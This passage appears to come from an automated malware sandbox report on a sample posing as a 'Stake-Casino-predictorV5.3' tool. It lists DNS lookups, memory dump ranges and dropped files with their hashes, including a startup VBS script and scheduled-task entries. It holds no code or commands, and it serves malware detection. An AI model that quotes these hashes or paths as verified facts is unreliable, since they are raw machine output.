| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
Files
memory/3092-0-0x00007FF825643000-0x00007FF825645000-memory.dmp
memory/3092-1-0x0000016731980000-0x0000016731990000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_plqxjzhw.iyw.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3092-11-0x00000167336F0000-0x0000016733712000-memory.dmp
memory/3092-12-0x00007FF825640000-0x00007FF826101000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\render.exe
| MD5 | 014f79448a036eefcfb2065dcad0d51c |
| SHA1 | 4ca8959526dc949edac260439b4a59144fbd8162 |
| SHA256 | e4118e2e86859a25ac4bccb4fb6c95a45c07f0bbe44621eb0228ffe40fd016e3 |
| SHA512 | b57603eeb9d0271b8f38d8a735b98decb4ae01b1f2835bc2b9026780d9ec617e3e8d6ba7398528520b5793deda2d675207de44b774be6d077d2952483b766358 |
C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\Data\driver.bat
| MD5 | c7489479e3959c074892fab7e3ccb78c |
| SHA1 | fa1491e22997924ca0cf9fcab7be03a2db5c32e8 |
| SHA256 | 232ff2bec97a61d7efe72df1e64e397da5a2091b694930f02db0bdf0dabef9b7 |
| SHA512 | 99732c64853e7d14febdbeee14a3b06480ae485993fc9e487945ab1b55b006666702b96ef607e4bf6267d465a8253a2b3a6553ed0ddfbbb954fab966142d25e2 |
memory/3092-26-0x000001674BEA0000-0x000001674C0BC000-memory.dmp
memory/3092-28-0x00007FF825640000-0x00007FF826101000-memory.dmp
memory/1884-30-0x00000266919C0000-0x00000266919D0000-memory.dmp
memory/1884-31-0x00007FF825640000-0x00007FF826101000-memory.dmp
memory/4168-41-0x0000025064620000-0x0000025064664000-memory.dmp
memory/4168-42-0x0000025064670000-0x00000250646E6000-memory.dmp
memory/4168-44-0x0000025064390000-0x0000025064398000-memory.dmp
memory/4168-45-0x00000250643A0000-0x00000250643D6000-memory.dmp
memory/4168-43-0x0000025064380000-0x0000025064388000-memory.dmp
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_686.vbs
| MD5 | dc1fd2e0be6d3140669cbffe07304ff8 |
| SHA1 | 3c040b8d1a42fef1cd3c55289037db6937a696f5 |
| SHA256 | 9a77b7f3bfc2fce5facb9038503a3052f00eabc7a1856403e1e0dc2bff6775a6 |
| SHA512 | d5d0290980bebd3ebcee4992b94c34732575d8eeae7d2bfe1404105f63c0992a49673dfc079398fe12f9f10605039bd5cb18892d05cec39c86b00fba927f6336 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 661739d384d9dfd807a089721202900b |
| SHA1 | 5b2c5d6a7122b4ce849dc98e79a7713038feac55 |
| SHA256 | 70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf |
| SHA512 | 81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 005bc2ef5a9d890fb2297be6a36f01c2 |
| SHA1 | 0c52adee1316c54b0bfdc510c0963196e7ebb430 |
| SHA256 | 342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d |
| SHA512 | f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22 |
memory/3416-76-0x0000000007DE0000-0x0000000007E0A000-memory.dmp
memory/1068-75-0x000001D5B3FB0000-0x000001D5B3FC2000-memory.dmp
memory/2968-124-0x00007FF8036F0000-0x00007FF803700000-memory.dmp
memory/1052-135-0x00007FF8036F0000-0x00007FF803700000-memory.dmp
memory/1228-134-0x00007FF8036F0000-0x00007FF803700000-memory.dmp
memory/1636-133-0x00007FF8036F0000-0x00007FF803700000-memory.dmp
memory/2088-138-0x00007FF8036F0000-0x00007FF803700000-memory.dmp
memory/3308-137-0x00007FF8036F0000-0x00007FF803700000-memory.dmp
memory/2584-132-0x00007FF8036F0000-0x00007FF803700000-memory.dmp
memory/1140-131-0x00007FF8036F0000-0x00007FF803700000-memory.dmp
memory/1712-130-0x00007FF8036F0000-0x00007FF803700000-memory.dmp
memory/1536-136-0x00007FF8036F0000-0x00007FF803700000-memory.dmp
memory/3544-129-0x00007FF8036F0000-0x00007FF803700000-memory.dmp
memory/1836-128-0x00007FF8036F0000-0x00007FF803700000-memory.dmp
memory/2112-127-0x00007FF8036F0000-0x00007FF803700000-memory.dmp
memory/776-126-0x00007FF8036F0000-0x00007FF803700000-memory.dmp
memory/936-125-0x00007FF8036F0000-0x00007FF803700000-memory.dmp
memory/3416-123-0x00007FF8036F0000-0x00007FF803700000-memory.dmp
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| MD5 | 0b990e24f1e839462c0ac35fef1d119e |
| SHA1 | 9e17905f8f68f9ce0a2024d57b537aa8b39c6708 |
| SHA256 | a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a |
| SHA512 | c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
| MD5 | ceb7caa4e9c4b8d760dbf7e9e5ca44c5 |
| SHA1 | a3879621f9493414d497ea6d70fbf17e283d5c08 |
| SHA256 | 98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9 |
| SHA512 | 1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| MD5 | 1e8e2076314d54dd72e7ee09ff8a52ab |
| SHA1 | 5fd0a67671430f66237f483eef39ff599b892272 |
| SHA256 | 55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f |
| SHA512 | 5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
| MD5 | f313c5b4f95605026428425586317353 |
| SHA1 | 06be66fa06e1cffc54459c38d3d258f46669d01a |
| SHA256 | 129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b |
| SHA512 | b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
| MD5 | 7d612892b20e70250dbd00d0cdd4f09b |
| SHA1 | 63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5 |
| SHA256 | 727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02 |
| SHA512 | f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1 |
memory/1884-233-0x00007FF825640000-0x00007FF826101000-memory.dmp